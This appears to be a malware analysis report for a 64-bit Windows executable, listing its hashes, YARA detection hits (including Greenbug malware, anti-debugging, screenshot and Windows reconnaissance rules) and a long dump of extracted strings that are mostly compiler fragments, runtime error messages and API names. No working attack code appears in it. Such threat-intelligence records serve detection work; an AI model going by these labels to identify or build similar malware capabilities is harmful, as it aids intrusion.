Sample details: e0175eecf8d31a6f32da076d22ecbdff (MD5)

Hashes
MD5: e0175eecf8d31a6f32da076d22ecbdff
SHA1: af85a187ad3fbbe985f77f0a4b492cd78c041d17
SHA256: cacc32ab0a1880afd74a040e8211662789cb70b252c25cb2d5971b707455ff5d
SSDEEP: 12288:XBJmM8sxaM2add/OP94zHA4ahi4Vr5P4XwJ8+q+qk+wFc65sYo/PkM+5rQRCLjj8:XBJmM8X8iqwD5kmrwCXMOT4dS99
Details
File Type: PE32+
Added: 2019-05-24 22:46:24
YARA Hits
YRP/Microsoft_Visual_Cpp_80_DLL | YRP/IsPE64 | YRP/IsWindowsGUI | YRP/HasDebugData | YRP/HasRichSignature | YRP/domain | YRP/IP | YRP/contentis_base64 | YRP/WMI_strings | YRP/Misc_Suspicious_Strings | YRP/DebuggerException__SetConsoleCtrl | YRP/anti_dbg | YRP/network_tcp_socket | YRP/screenshot | YRP/win_files_operation | YRP/Big_Numbers0 | YRP/Big_Numbers1 | YRP/CRC32_poly_Constant | YRP/CRC32_table | YRP/BASE64_table | YRP/Str_Win32_Winsock2_Library | YRP/Greenbug_Malware_4 | YRP/Greenbug_Malware_5 | FlorianRoth/Recon_Commands_Windows_Gen1 | FlorianRoth/Greenbug_Malware_4 | FlorianRoth/Greenbug_Malware_5
Strings
		!This program cannot be run in DOS mode.
`.rdata
@.data
.pdata
@.rsrc
@.reloc
@SUVATAWH
 A_A\^][
l$ I9h
SVWAVH
8A^_^[
t$ AVH
UVWATAUAVAWH
t7@80t
t7@80t
PA_A^A]A\_^]
@UAVAWH
 A_A^]
 A_A^]
UVWATAUAVAWH
L$ L;a
pA_A^A]A\_^]
@UVWAVAWH
A_A^_^]
WAVAWH
UWATAVAWH
A_A^A\_]
WATAUAVAWH
A_A^A]A\_
@UVWAVAWH
A_A^_^]
WAVAWH
WATAUAVAWH
A_A^A]A\_
t$@f9u
fB94@u
@UVWATAUAVAWH
A_A^A]A\_^]
@UVWATAUAVAWH
A_A^A]A\_^]
@UVWAVAWH
A_A^_^]
@USVWAVH
A^_^[]
SVWATAUAVAWH
A_A^A]A\_^[
SUVWATAVAWH
pA_A^A\_^][
@USVWATAUAVAWH
A_A^A]A\_^[]
WATAUAVAWH
A_A^A]A\_
WATAUAVAWH
A_A^A]A\_
UATAUAVAWH
A_A^A]A\]
<;Ch} 
UAVAWH
WATAUAVAWH
A_A^A]A\_
WATAUAVAWH
A_A^A]A\_
WATAUAVAWH
A_A^A]A\_
UWATAVAWH
A_A^A\_]
UAVAWH
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
@SUVWAVH
PA^_^][
@SUVWATAVAWH
PA_A^A\_^][
@UVWAVAWH
A_A^_^]
WAVAWH
@UVWAVAWH
A_A^_^]
C@H+C8H
t Hc@D
VWATAVAWH
@A_A^A\_^
@WAVAWH
@A_A^_
@WAVAWH
A@H+A8H
M@H+M8H
@A_A^_
WAVAWH
F@H+F8H
@UVWATAUAVAWH
A_A^A]A\_^]
f9l$Pu
fB9,@u
WATAUAVAWH
A_A^A]A\_
UATAUAVAWH
A_A^A]A\]
u#D9C\u
@USVWATAVAWH
CT$ H;
A_A^A\_^[]
SUVWAVH
A^_^][
@USVWATAVAWH
A_A^A\_^[]
@USVWATAVAWH
A_A^A\_^[]
@UVWAVAWH
A_A^_^]
@UVWAVAWH
A_A^_^]
@USVWATAVAWH
A_A^A\_^[]
UAVAWH
UAVAWH
E`H+EXH
E`H+EXH
@VWATAVAWH
2333333
A_A^A\_^
@UVWAVAWH
A_A^_^]
@SUVWAVH
0A^_^][
\$ VWAVH
fA9	u.I
@WAVAWH
UUUUUUU
@A_A^_
UUUUUUU
@WAVAWH
UUUUUUU
@A_A^_
UUUUUUU
WATAUAVAWH
UUUUUUU
UUUUUUU
A_A^A]A\_
@SUVATAUAVAWH
@A_A^A]A\^][
L9L$(L
t$ AVH
WATAUAVAWH
A_A^A]A\_
@VWAVH
WATAUAVAWH
A_A^A]A\_
UUUUUUU
@VWAVH
H;9t`f
SVWATAUAVAWH
`A_A^A]A\_^[
|$ fA98u
fB9<@u
t$ AVH
\$ VATAWH
0A_A\^
0A_A\^
D$XH;D$`t D
L$ SVWATAUAVAWH
I9t$0w
pA_A^A]A\_^[
@VWAVH
^0H9?t(H
|$ AVH
|$ AVH
f9\$@t
f9\$@t
@SUVAVH
(A^^][
H;\$ tB
SVWAVAWH
0A_A^_^[
|$ ATAVAWH
~@H9FXu
 A_A^A\
VWATAUAWH
L;KHu$H
L;KHu$H
0A_A]A\_^
KXL9KPt
@SUWATAUAVAWH
L$PL;IPs
M;L$Hu:I
M;L$Hu9I
A_A^A]A\_][
L$PM;L$Ps
L$XM9L$Pt)E
@USAWH
WAVAWH
L$ VWATAUAVAWH
l$HA_A^A]A\_^
y H9y0u
A0H9y8u
t$ AVH
@UVWAUAWH
pA_A]_^]
pA_A]_^]
UVWAVH
1D81t+D8q
HA^_^]
G@9E(t
GD9E(t
GH9E(t
HA^_^]
ATAVAWH
0A_A^A\
0A_A^A\
0A_A^A\
0A_A^A\
0A_A^A\
+9kdt	H
@USATAVH
@81t)@8q
A^A\[]
@UWAVH
@8t$Pu
|$ AVH
SUVWATAVAWH
A_A^A\_^][
SUVWATAVAWH
A_A^A\_^][
@UVWAVAWH
A_A^_^]
@8,8t H
D$@HcH
D$@HcH
D$@HcH
D$@HcH
D$`HcH
D$`HcH
D$`HcH
D$`HcH
@UWAVH
L9t$xt
D$pHcH
D$pHcH
D$pHcH
D$`HcH
D$`HcH
D$`HcH
D$`HcH
f9\$Pt
UWATAVAWH
A_A^A\_]
@UVWAVAWH
A_A^_^]
@UVWATAUAVAWH
A_A^A]A\_^]
D$PHcH
@UVWATAUAVAWH
A_A^A]A\_^]
fF94@u
\$Pf9]
UAVAWH
fF9<@u
WAVAWH
UVWATAUAVAWH
PA_A^A]A\_^]
UATAUAVAWH
A_A^A]A\]
UWATAVAWH
A_A^A\_]
@SUVWAVH
0A^_^][
\$ VWAVH
|$ AVL
l$@H9+
|$ AVAWH
l$HI9+
|$0A_A^
@SUVWAVH
D$RH9D$@u
`A^_^][
|$ ATAUAVAWL
|$@A_A^A]A\
WATAUAVAWL
t$HA_A^A]A\_
@SUAVH
@VWAVH
H;9tBf
t$ WAVAWH
0A_A^_
t$ WAVAWH
0A_A^_
@VWATAVAWH
`A_A^A\_^
WATAUAVAWH
A_A^A]A\_
VWATAVAWH
PA_A^A\_^
SVWATAUAVAWH
PA_A^A]A\_^[
L$ SVWH
L$ SVWH
^0H9?t(H
^0H9?t(H
@VWAVH
t$ AVH
@SUVWATH
`A\_^][
\$ UVWATAWH
@A_A\_^]
l$ VWAVH
@SUVWAVAWH
fD9|$0u
HA_A^_^][
WATAUAVAWH
0A_A^A]A\_
UVWATAUAVAWH
@A_A^A]A\_^]
@UVWATAVH
j$LcJ L
Hct$hff
0A^A\_^]
|$ ATAVAWH
 A_A^A\
@SWAWH
|$ AVH
VATAUAVAWH
 A_A^A]A\^
|$ ATAUAVAWD
\$(A_A^A]A\
t$ WATAWH
 A_A\_
*H9{ t"D
uVH9{(t$D
H;C(u,H9{0t"D
\$ UVWAVAWH
0A_A^_^]
@UWATAUAVAWH
A_A^A]A\_]
9;C<r	
H9yhu0
L9#t	D
K(D9c$t
T$T9L$P
D8c,teL9#u`
D$|+S 
f9t$Fu	
|$ ATAVAWH
@A_A^A\
l$ VWAVH
9D$(}d
9A@t<H
UVWAVAWH
D8:u2H
A_A^_^]
D9>tXA
UVWATAUAVAWH
`A_A^A]A\_^]
@VWAVH
@VWAVH
@VWAVH
UVWATAUAVAWH
A_A^A]A\_^]
toH91uj
toH91uj
UVWATAUAVAWH
G	:E	u
:O	t	H
@8w	u7E3
:O	t	H
:O	t	H
G	:E	u
:O	t	H
A_A^A]A\_^]
UVWATAUAVAWH
:O	t	H
@8w	u8E3
:O	t	H
:O	t	H
:O	t	H
l$$D8d$!u
A_A^A]A\_^]
UVWATAUAVAWH
:K	t	H
D8K	u7E3
A_A^A]A\_^]
WAVAWH
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
PA_A^A]A\_^]
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
@SUVWATAVAWH
D$PH9D$8t
A_A^A\_^][
@SUVWATAVAWH
D$PH9D$8t
A_A^A\_^][
USVWAVAWH
A_A^_^[]
USVWAVAWH
A_A^_^[]
USVWAVAWH
A_A^_^[]
@SUVWAVAWH
D$PH9D$8t
A_A^_^][
@SUVWATAVAWH
D$PH9D$8t
A_A^A\_^][
@SUVWATAVAWH
D$PH9D$8t
A_A^A\_^][
@USVWATAUAVAWH
H9D$@t
A_A^A]A\_^[]
SUVWATAVAWH
A_A^A\_^][
SUVWATAVAWH
A_A^A\_^][
@USVWATAVAWH
A_A^A\_^[]
UVWATAUAVAWH
`A_A^A]A\_^]
UVWATAUAVAWH
`A_A^A]A\_^]
UVWATAUAVAWH
`A_A^A]A\_^]
UVWATAUAVAWH
`A_A^A]A\_^]
@USVWAWH
0A__^[]
@USVWAWH
@A__^[]
x ATAVAWH
 A_A^A\
x ATAVAWH
A_A^A\
VWATAVAWH
A_A^A\_^
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
f9/t	H
SVWAVAWH
0A_A^_^[
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
toH91uj
toH91uj
toH91uj
toH91uj
toH91uj
toH91uj
toH91uj
toH91uj
toH91uj
toH91uj
UVWATAUAVAWH
l$4D8d$1u
A_A^A]A\_^]
UVWATAUAVAWH
l$4D8d$1u
A_A^A]A\_^]
UVWATAUAVAWH
l$$D8d$!u
A_A^A]A\_^]
UVWATAUAVAWH
l$$D8d$!u
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
f;E	tYD8K
A_A^A]A\_^]
UVWATAUAVAWH
f;E	tYD8K
A_A^A]A\_^]
UVWATAUAVAWH
`A_A^A]A\_^]
UVWATAUAVAWH
|<@ u&@
A_A^A]A\_^]
UVWATAUAVAWH
|<@ u&@
A_A^A]A\_^]
WATAUAVAWH
VUD8oDu!
A_A^A]A\_
WATAUAVAWH
VUD8oDu!
A_A^A]A\_
ATAVAWH
D$0.fD
D$0,fD
A_A^A\
ATAVAWH
D$0.fD
D$0,fD
A_A^A\
UVWATAUAVAWH
<xt!E3
A_A^A]A\_^]
UVWATAUAVAWH
<xt!E3
A_A^A]A\_^]
UATAUAVAWH
A_A^A]A\]
UATAUAVAWH
A_A^A]A\]
UVWATAUAVAWH
)D$pH+_
A_A^A]A\_^]
UVWATAUAVAWH
)D$pH+_
A_A^A]A\_^]
WAVAWH
 A_A^_
WAVAWH
 A_A^_
L;L$(t
L;L$(A
UVWAVAWH
A_A^_^]
@USVWATAVAWH
A_A^A\_^[]
UVWAVAWH
A_A^_^]
@USVWATAVAWH
A_A^A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
@SUVWATAVAWH
D$PH9D$8t
A_A^A\_^][
@SUVWATAVAWH
D$PH9D$8t
A_A^A\_^][
USVWAVAWH
A_A^_^[]
USVWAVAWH
A_A^_^[]
USVWAVAWH
A_A^_^[]
@SUVWAVAWH
D$PH9D$8t
A_A^_^][
@SUVWATAVAWH
D$PH9D$8t
A_A^A\_^][
@SUVWATAVAWH
D$PH9D$8t
A_A^A\_^][
@USVWATAUAVAWH
H9D$@t
A_A^A]A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAUAVAWH
A_A^A]A\_^[]
@SUVWATAVAWH
D$PH9D$8t
A_A^A\_^][
@SUVWATAVAWH
D$PH9D$8t
A_A^A\_^][
USVWAVAWH
A_A^_^[]
USVWAVAWH
A_A^_^[]
USVWAVAWH
A_A^_^[]
@SUVWAVAWH
D$PH9D$8t
A_A^_^][
@SUVWATAVAWH
D$PH9D$8t
A_A^A\_^][
@SUVWATAVAWH
D$PH9D$8t
A_A^A\_^][
@USVWATAUAVAWH
H9D$@t
A_A^A]A\_^[]
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
VWATAVAWH
Pp<:u3H
Pp<:u/H
A_A^A\_^
VWATAVAWH
Pp<:u3H
Pp<:u/H
A_A^A\_^
WATAUAVAWH
L96tfH
0A_A^A]A\_
t$ WAVAWH
L9|$pv^H;
fD9|$Xu
H;D$pr
0A_A^_
l$ VWATAVAWH
A_A^A\_^
UVWATAUAVAWH
@A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
SUVWATAVAWH
A_A^A\_^][
SUVWATAVAWH
A_A^A\_^][
@USVWATAUAVAWH
A_A^A]A\_^[]
SUVWATAVAWH
A_A^A\_^][
SUVWATAVAWH
A_A^A\_^][
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAVAWH
A_A^A\_^[]
@USVWATAVAWH
A_A^A\_^[]
UVWAVAWH
0A_A^_^]
UVWAVAWH
@A_A^_^]
WAVAWH
 A_A^_
WAVAWH
 A_A^_
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
@VWAVH
toH91uj
toH91uj
toH91uj
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
`A_A^A]A\_^]
UVWATAUAVAWH
:O	t	I
@8w	u7E3
:O	t	H
:O	t	I
|<8 u!@
A_A^A]A\_^]
WATAUAVAWH
VUD8oDu!
A_A^A]A\_
UATAUAVAWH
A_A^A]A\]
UVWATAUAVAWH
l$(L9k
D9T$0u3H
A_A^A]A\_^]
UVWAVAWH
A_A^_^]
@USVWATAVAWH
A_A^A\_^[]
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
PP<:woH
PP<:woH
A_A^A]A\_^]
VWATAVAWH
PP<:u3H
PP<:u/H
A_A^A\_^
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
UVWAVAWH
A_A^_^]
@USVWATAUAVAWH
A_A^A]A\_^[]
@USVWATAVAWH
A_A^A\_^[]
@USVWATAVAWH
A_A^A\_^[]
p WAVAWH
 A_A^_
SUVWATAUAVAWH
H+L$ x<H
8A_A^A]A\_^][
p WAVAWH
 A_A^_
UVWATAUAVAWH
l$pH9\$ u
H+L$(xBH
0A_A^A]A\_^]
WATAUAVAWH
0A_A^A]A\_
x ATAVAWH
A_A^A\
UVWATAUAVAWH
pA_A^A]A\_^]
UVWATAUAVAWH
pA_A^A]A\_^]
USVWATAUAVAWH
)t$0Hc
HA_A^A]A\_^[]
UVWATAUAVAWH
`A_A^A]A\_^]
WATAUAVAWH
 A_A^A]A\_
WAVAWH
 A_A^_
USVWATAUAVAWH
)t$0Hc
HA_A^A]A\_^[]
UVWATAUAVAWH
pA_A^A]A\_^]
WATAUAVAWH
 A_A^A]A\_
USVWATAUAVAWH
)t$0Hc
HA_A^A]A\_^[]
UVWATAUAVAWH
pA_A^A]A\_^]
WATAUAVAWH
 A_A^A]A\_
uNfE9P
ATAVAWH
 A_A^A\
WATAUAVAWH
 A_A^A]A\_
VWATAVAWH
A_A^A\_^
WATAUAVAWH
@A_A^A]A\_
x ATAVAWH
0A_A^A\
WAVAWH
 A_A^_
AUAVAWH
0A_A^A]
fA;8utI
fA;0t)fA98t
SVWAVH
8A^_^[
D8t$8t
UVWATAUAVAWH
 A_A^A]A\_^]
@8l$8t
UAVAWH
WAVAWH
fD9>u"
0A_A^_
l$ VWAVH
9\$ ~>L
s WATAUAVAWH
9t$P~.8\$vt(H
9t$P~98\$vt3H
A_A^A]A\_
l$ VWAUAVAWH
L$(fA;
u$HcG$H;
t5f9(t
A_A^A]_^
VWATAVAWH
 A_A^A\_^
x ATAVAWH
 A_A^A\
x ATAUAWH
@A_A]A\
@UATAUAVAWH
!t$(H!t$ I
A_A^A]A\]
WAVAWH
 A_A^_
VWATAVAWH
A_A^A\_^
UVWATAUAVAWH
G0Hc	H
A_A^A]A\_^]
D8eoupH
UVWATAUAVAWH
pA_A^A]A\_^]
WATAUAVAWH
 A_A^A]A\_
AUAVAWH
0A_A^A]
@SVWATAUAVAWH
L!|$@L!
D$HHcH
A_A^A]A\_^[
SVWATAUAVAWH
0A_A^A]A\_^[
WATAVH
@A^A\_
AUAVAWH
@A_A^A]
{ ATAVAWH
A_A^A\
C0H9C(r
@UAVAWH
UVWATAUAVAWH
H+D$`H+D$H3
A_A^A]A\_^]
|$ AVH
fffffff
WATAUAVAWH
D$@!\$(H!\$ 
A_A^A]A\_
x ATAVAWH
@A_A^A\
9\$(tlM
@UVWATAUAVAWH
e0A_A^A]A\_^]
x ATAVAWH
;D8|$Ht
A_A^A\
x ATAVAWH
;D8|$Ht
A_A^A\
p WATAUAVAWH
A_A^A]A\_
UATAUAVAWH
A_A^A]A\]
@USVWATAUAVAWH
eHA_A^A]A\_^[]
HcD$hH
@SUVWATAVAWH
zu|D!t$ E3
A_A^A\_^][
WATAUAVAWH
A_A^A]A\_
VWATAVAWH
 A_A^A\_^
\$ UVWATAUAVAWH
D9l$dtXH
HcD$PH;
HcD$PH;
A_A^A]A\_^]
l$ VWATAVAWH
T$&@8t$&t9@8r
A81t@@8r
A_A^A\_^
WAVAWH
fE98t'
0A_A^_
@USVWATAUAVAWH
A_A^A]A\_^[]
;Cu1f9K
f93t$M;
L$ SUVWH
|$ ATAVAWH
0A_A^A\
WATAUAVAWH
0A_A^A]A\_
\$ UVWATAUAVAWH
^fD9+t
A_A^A]A\_^]
\$ UVWATAUAVAWH
A_A^A]A\_^]
fD9|$bu
H9L$Ht8H
UAVAWH
t$ WAVAWH
LcA<E3
t$ WATAUAVAWH
D!l$h3
0A_A^A]A\_
` AUAVAWH
t$8Hc0I
\$0D9=r
A_A^A]
t$ WATAUAVAW
A_A^A]A\_
VWATAVAWH
 A_A^A\_^
USVWAVH
A^_^[]
UVWATAUAVAWH
9D$XumE
A_A^A]A\_^]
WAVAWH
 A_A^_
t$ WATAUAVAWH
0A_A^A]A\_
@UATAUAVAWH
A_A^A]A\]
D82u&H
D8t$Ht
Hct$@H
sYHcL$HH
x ATAVAWH
< tD<	t@
 A_A^A\
H3E H3E
WATAUAVAWH
gfffffffH
D8L$Ht
A_A^A]A\_
x AUAVAWH
A_A^A]
@SUVWH
@SUVWH
@SUVWAVH
A^_^][
x ATAVAWH
D8&t4H
D8d$Ht
A_A^A\
ATAVAWH
D8d$8t
@A_A^A\
\$ UVWATAUAVAWH
fD9 t	H
A_A^A]A\_^]
D$DH3\$@H
UVWATAUAVAWH
 A_A^A]A\_^]
WAVAWH
 A_A^_
WATAUAVAWH
A_A^A]A\_
UVWATAUAVAWH
L$`tcA
 A_A^A]A\_^]
UVWATAUAVAWH
A,A9A(v&L
0A_A^A]A\_^]
WATAUAVAWH
O,D9O(vcH
0A_A^A]A\_
WATAUAVAWH
A;H$v}H
0A_A^A]A\_
SUVWATAUAVAWH
HA_A^A]A\_^][
@VWAVH
SUVWATAUAVAWH
\$4E;M
;B$vuI
D$0taA
D$0C+D0(
@09D$0
D$PE;M
H$E+H,toA
@(A9P4A
BP4A+@4;
s	A9;A
xA_A^A]A\_^][
WATAUAVAWH
C9|)$u>C
0A_A^A]A\_
VWAUAVAWH
A`D9L8
;B$vUH
,t0D9J0v*L
0A_A^A]_^
t$ WATAUAVAWH
D8M@t^
+J$D8M@
0A_A^A]A\_
UVWATAUAVAWH
0A_A^A]A\_^]
WATAUAVAWH
 A_A^A]A\_
UVWATAUAVAWH
 A_A^A]A\_^]
L$ UVWATAUAVAWH
0A_A^A]A\_^]
x ATAVAWH
0A_A^A\
@SUVWAVH
0A^_^][
9G$vAD
D9G$s5
l$ VWATAUAVAWE3
D9x(uiH
A(9B(D
X(D9y(
t'B;| 
l$PA_A^A]A\_^
WATAUAVAWH
A_A^A]A\_
H9_ht/H
WATAUAVAWH
 A_A^A]A\_
x ATAVA
A$+A,t[3
|$0A^A\
WATAUAVAWH
0A_A^A]A\_
UVWATAUAVAWH
l$`C9,
 A_A^A]A\_^]
x AVE3
UVWATAUAVAWH
D;z,v(A
&D;j0u
 A_A^A]A\_^]
E8X@t8A
R0E8XAt
B0E8XAt
WAVAWH
9_P~%E3
VWAUAVAWH
9WP~FM
ukHcOP
HcGl;Gh}
A_A^A]_^
t H9X8tV
9YD~*3
9_D~*3
t*H9X8u$@8
E;Bl}EI
B`E;Bh|
E+BhIcJhL
UATAUAVAWH
q(9YD~tE3
9_D~E3
A_A^A]A\]
x ATAVAWH
 A_A^A\
\$Pu&H
USVWATAUAVAWH
_(HcODI
G8HcODI
G0LcGDI
D9g@~2Ic
A_A^A]A\_^[]
UVWATAUAVAWH
0A_A^A]A\_^]
C`D;Sh|
D+ShHcKhL
C`D;Sh|
D+ShHcKhL
;Ct~|H
;Ct~gH
x ATAVAWH
F`;Vh|
+VhHcNhL
C(9C u!
C,9C$u
 A_A^A\
H!\$(H!\$0
VWAUAVAWH
0A_A^A]_^
t$ WATAUAVAW
A_A^A]A\_
VWATAVAWH
 A_A^A\_^
UVWATAUAVAWH
0A_A^A]A\_^]
SVWATAUAVAWH
PA_A^A]A\_^[
@UATAUAVAWH
A_A^A]A\]
` AUAVAWH
0A_A^A]
UATAUAVAWH
A_A^A]A\]
WATAUAVAWH
A_A^A]A\_
f9.uVH
f9.u"H
tVf91tQH
x ATAVAWH
 A_A^A\
@SUVWATAVAWH
3fD9 t
A_A^A\_^][
|$ AVH
tSf91tNH
D;|$0t9
@USVWATAVAWH
tyfD9 tsH
tHfD9 tB
@A_A^A\_^[]
UVWATAUAVAWH
D$DD9T$X
|$h+t$D+
A_A^A]A\_^]
WAVAWH
 A_A^_
@SUVWATAVAWH
tcH95Q
PA_A^A\_^][
WATAUAVAWH
 A_A^A]A\_
USVWATAUAVAWH
8UXt$@
XA_A^A]A\_^[]
UVWATAUAVAWH
A_A^A]A\_^]
@USVWH
VWAUAVAWH
9WP~IM
ukHcOP
HcGl;Gh}
A_A^A]_^
H99u{H
WATAUAVAWH
A_A^A]A\_
H;YXt 
twH;^XtH3
t$H;^Xt
tGH;~XtA
C`D;Sh|
D+ShHcKhL
;Ct~ZH
;Ct~EH
91~*E3
WAVAWH
 A_A^_
@UAVAWH
ePA_A^]
u59_ @
WATAUAVAWH
A_A^A]A\_
x ATAVAWH
0A_A^A\
VWATAVAWH
0A_A^A\_^
x ATAVAWH
 A_A^A\
L9w t?H
WAVAWH
 A_A^_
H9J t1
UVWATAUAVAWH
w 9^ w	9^$
8\$!t)A
tW8\$!u;8\$"t5D
PA_A^A]A\_^]
@VWAVH
UVWAVAWH
A_A^_^]
WAVAWH
 A_A^_
WAVAWH
0A_A^_
l$ VWAVH
u)!t$(H
C`D;Sh|
D+ShHcKhL
;Ct~ZH
;Ct~EH
WAVAWH
 A_A^_
F(LcF I
9_P~$E3
VWAUAVAWH
9WP~IM
ukHcOP
HcGl;Gh}
A_A^A]_^
WAVAWH
 A_A^_
Hc;HcK
h UAVAWH
UVWATAVH
@A^A\_^]
UAVAWH
UVWATAUAVAWH
 A_A^A]A\_^]
l$ VWATAVAWH
 A_A^A\_^
u!!D$(H
|$ AVH
t$ WATAUAVAWH
A_A^A]A\_
9_P~$E3
C`D;Sh|
D+ShHcKhL
;Ct~ZH
;Ct~EH
9_P~LE3
K4A+H 
VWAUAVAWH
9WP~EM
ukHcOP
HcGl;Gh}
A_A^A]_^
VWAUAVAWH
9WP~IM
ukHcOP
HcGl;Gh}
A_A^A]_^
UAVAWH
u%!D$@H
WAVAWH
K 9N vEH
0A_A^_
t$ WAVAWH
;Vl}[H
F`;Vh|
+VhHcNhL
 A_A^_
l$ VWAVH
UAVAWH
C`D;Sh|
D+ShHcKhL
;Ct~ZH
;Ct~EH
UVWATAUAVAWH
8D$ u+I
A_A^A]A\_^]
C4D+@ H
D$(A9h
@8l$8t
r"fD;A
@8l$8t
|$ UATAUAVAWH
A_A^A]A\]
|$ UATAUAVAWH
A_A^A]A\]
UVWATAUAVAWH
A_A^A]A\_^]
x AUAVAWH
 A_A^A]
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
0A_A^A]A\_^]
WAVAWH
 A_A^_
SVWAVH
D$`csm
H9BhuTH
~`8A!t
SVWAVAWH
PA_A^_^[
^ffffff
fffffff
ffffff
D$0f;VPu
UVWATAUAVAWH
D$`HcK
H;D$xu
 A_A^A]A\_^]
WATAUAVAWH
 A_A^A]A\_
SUVWATAUAVAWH
H9D$(u^L
L$0D;t$ s
HA_A^A]A\_^][
WATAUAVAWH
A_A^A]A\_
u!!D$(H
ATAVAWH
0A_A^A\
WAVAWH
0A_A^_
ATAVAWH
0A_A^A\
H#t$0tB
@USVWATAUAVAWH
H+G H=
A_A^A]A\_^[]
@SUVWATAUAVAWH
H+C H=
A_A^A]A\_^][
WATAUAVAWH
A_A^A]A\_
WATAUAVAWH
@A_A^A]A\_
WATAUAVAWH
A_A^A]A\_
x ATAVAWH
 A_A^A\
x ATAVAWH
 A_A^A\
UAVAWH
@A_A^]
UAVAWH
@A_A^]
t.8\$P
WATAVH
WATAUAVAWH
t=L95]4
0A_A^A]A\_
D9t$htrH
@8t$8t
H(H9J(u
bad allocation
permission denied
file exists
no such device
filename too long
device or resource busy
io error
directory not empty
invalid argument
no space on device
no such file or directory
function not supported
no lock available
not enough memory
resource unavailable try again
cross device link
operation canceled
too many files open
permission_denied
address_in_use
address_not_available
address_family_not_supported
connection_already_in_progress
bad_file_descriptor
connection_aborted
connection_refused
connection_reset
destination_address_required
bad_address
host_unreachable
operation_in_progress
interrupted
invalid_argument
already_connected
too_many_files_open
message_size
filename_too_long
network_down
network_reset
network_unreachable
no_buffer_space
no_protocol_option
not_connected
not_a_socket
operation_not_supported
protocol_not_supported
wrong_protocol_type
timed_out
operation_would_block
address family not supported
address in use
address not available
already connected
argument list too long
argument out of domain
bad address
bad file descriptor
bad message
broken pipe
connection aborted
connection already in progress
connection refused
connection reset
destination address required
executable format error
file too large
host unreachable
identifier removed
illegal byte sequence
inappropriate io control operation
invalid seek
is a directory
message size
network down
network reset
network unreachable
no buffer space
no child process
no link
no message available
no message
no protocol option
no stream resources
no such device or address
no such process
not a directory
not a socket
not a stream
not connected
not supported
operation in progress
operation not permitted
operation not supported
operation would block
owner dead
protocol error
protocol not supported
read only file system
resource deadlock would occur
result out of range
state not recoverable
stream timeout
text file busy
timed out
too many files open in system
too many links
too many symbolic link levels
value too large
wrong protocol type
0123456789ABCDEFabcdef-+Xx
0123456789-+Ee
0123456789ABCDEFabcdef-+XxPp
:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December
0123456789-
%b %d %H : %M : %S %Y
%m / %d / %y
:AM:am:PM:pm
%I : %M : %S %p
%H : %M
%H : %M : S
%d / %m / %y
0123456789-
0123456789ABCDEFabcdef-+Xx
0123456789-+Ee
0123456789-
0123456789ABCDEFabcdef-+Xx
0123456789-+Ee
0123456789-
0123456789ABCDEFabcdef-+XxPp
0123456789ABCDEFabcdef-+XxPp
+v$x+v$xv$+xv+$xv$+x+$vx+$vx$v+x+$vx$+vx+v $+v $v $+v +$v $++$ v+$ v$ v++$ v$+ v+xv$+ v$v$ +v+ $v$ ++x$v+ $v$v ++ $v$ +v
0123456789-
0123456789-
A0123456789abcdefghijklmnopqrstuvwxyz
0123456789abcdefghijklmnopqrstuvwxyz
0123456789abcdefABCDEF
Unknown exception
CorExitProcess
_hypot
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
bad exception
Lock already taken
pEvents
SetThreadGroupAffinity
GetThreadGroupAffinity
GetCurrentProcessorNumberEx
GetLogicalProcessorInformationEx
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
CreateEventExW
CreateSemaphoreExW
SetThreadStackGuarantee
CreateThreadpoolTimer
SetThreadpoolTimer
WaitForThreadpoolTimerCallbacks
CloseThreadpoolTimer
CreateThreadpoolWait
SetThreadpoolWait
CloseThreadpoolWait
FlushProcessWriteBuffers
FreeLibraryWhenCallbackReturns
GetCurrentProcessorNumber
GetLogicalProcessorInformation
CreateSymbolicLinkW
SetDefaultDllDirectories
EnumSystemLocalesEx
CompareStringEx
GetDateFormatEx
GetLocaleInfoEx
GetTimeFormatEx
GetUserDefaultLocaleName
IsValidLocaleName
LCMapStringEx
GetCurrentPackageId
GetTickCount64
GetFileInformationByHandleExW
SetFileInformationByHandleW
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
